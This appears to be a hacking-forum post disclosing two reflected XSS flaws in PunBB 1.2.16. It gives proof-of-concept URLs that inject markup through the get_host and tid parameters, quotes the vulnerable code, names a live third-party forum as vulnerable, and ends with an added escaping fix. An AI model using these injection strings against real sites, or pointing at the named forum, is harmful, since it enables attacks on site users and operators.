tw8

[RST] PunBB <= 1.2.16 XSS (0DAY)


Hi!

I found 2 XSS vulnerabilities in PunBB and thought I'd share them with you :P. For those who don't know what PunBB is, take a look at the official site.

Vulnerability #1 (requires admin/moderator rights)

Download script: http://punbb.org/download/punbb-1.2.16.zip

http://[localhost]/[path]/moderate.php?get_host=0.0.0.0">[script]

Vulnerable code



if (isset($_GET['get_host']))
{
    if ($pun_user['g_id'] > PUN_MOD)
        message($lang_common['No permission']);

    // Is get_host an IP address or a post ID?
    // The pattern is unanchored, so any value that merely contains an
    // IP-like substring passes and the raw value is kept in $ip.
    if (@preg_match('/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/', $_GET['get_host']))
        $ip = $_GET['get_host'];
    else
    {
        $get_host = intval($_GET['get_host']);
        if ($get_host < 1)
            message($lang_common['Bad request']);

        $result = $db->query('SELECT poster_ip FROM '.$db->prefix.'posts WHERE id='.$get_host) or error('Unable to fetch post IP address', __FILE__, __LINE__, $db->error());
        if (!$db->num_rows($result))
            message($lang_common['Bad request']);

        $ip = $db->result($result);
    }

    // $ip is written into the page body and into an href without escaping.
    message('The IP address is: '.$ip.'<br />The host name is: '.@gethostbyaddr($ip).'<br /><br /><a href="admin_users.php?show_users='.$ip.'">Show more users for this IP</a>');
}

Vulnerability #2 (requires the Private Messaging System to be installed)

Download script: http://www.punres.org/download.php?id=1579

http://[localhost]/[path]/message_send.php?id=2&tid=">[script]

Vulnerable code



<input type="hidden" name="topic_redirect" value="<?php echo isset($_GET['tid']) ? $_GET['tid'] : '' ?>" />

Example of a vulnerable forum with > 40,000 users:

http://www.deblok83.com/forum.php

P.S.: I didn't ask anyone for permission to put RST in the title, because kwe is "Stepped Out" and PMs get read pretty rarely. So if you don't agree, you can remove RST from the title, but I don't think it's anything bad :P.

Good luck :P!
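The fix a maintainer would apply to both reflection points, as an added example written for this page rather than taken from PunBB or from the post above; it assumes stand-alone helper names (classify_get_host, render_host_message, hidden_redirect_field) and uses PHP's built-in filter_var and htmlspecialchars instead of PunBB's own message() and pun_htmlspecialchars() wrappers:

```php
<?php
// Added example, not PunBB code. Helper names are hypothetical.

// Vulnerability #1: the original regex is unanchored, so any string that
// contains an IP-like substring is accepted and echoed raw. Validate the
// whole value instead and reject everything else as a bad request.
function classify_get_host(string $raw): ?array
{
    if (filter_var($raw, FILTER_VALIDATE_IP) !== false) {
        return ['ip' => $raw];              // complete IPv4/IPv6 address only
    }
    if (ctype_digit($raw) && (int)$raw >= 1) {
        return ['post_id' => (int)$raw];    // caller resolves poster_ip via the DB
    }
    return null;                            // anything else: bad request
}

// Output side: escape every untrusted value, including an IP that came back
// from the database, before it lands in HTML text or in an href.
function render_host_message(string $ip): string
{
    $safe_ip   = htmlspecialchars($ip, ENT_QUOTES, 'UTF-8');
    $host      = @gethostbyaddr($ip);
    $safe_host = htmlspecialchars($host === false ? '' : $host, ENT_QUOTES, 'UTF-8');
    return 'The IP address is: ' . $safe_ip . '<br />'
         . 'The host name is: ' . $safe_host . '<br /><br />'
         . '<a href="admin_users.php?show_users=' . rawurlencode($ip) . '">'
         . 'Show more users for this IP</a>';
}

// Vulnerability #2: the hidden field echoed $_GET['tid'] verbatim inside a
// double-quoted attribute. A topic ID is numeric, so cast it and escape anyway.
function hidden_redirect_field(?string $tid): string
{
    $value = ($tid !== null && ctype_digit($tid)) ? (string)(int)$tid : '';
    return '<input type="hidden" name="topic_redirect" value="'
         . htmlspecialchars($value, ENT_QUOTES, 'UTF-8') . '" />';
}

// Demonstration with the input shapes from the post (constructed values).
var_dump(classify_get_host('0.0.0.0">[script]'));
var_dump(classify_get_host('10.0.0.1'));
var_dump(classify_get_host('42'));
echo render_host_message('10.0.0.1'), "\n";
echo hidden_redirect_field('">[script]'), "\n";
echo hidden_redirect_field('17'), "\n";
```

A request that fails classify_get_host() should be answered with the existing Bad request message rather than a partial result.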
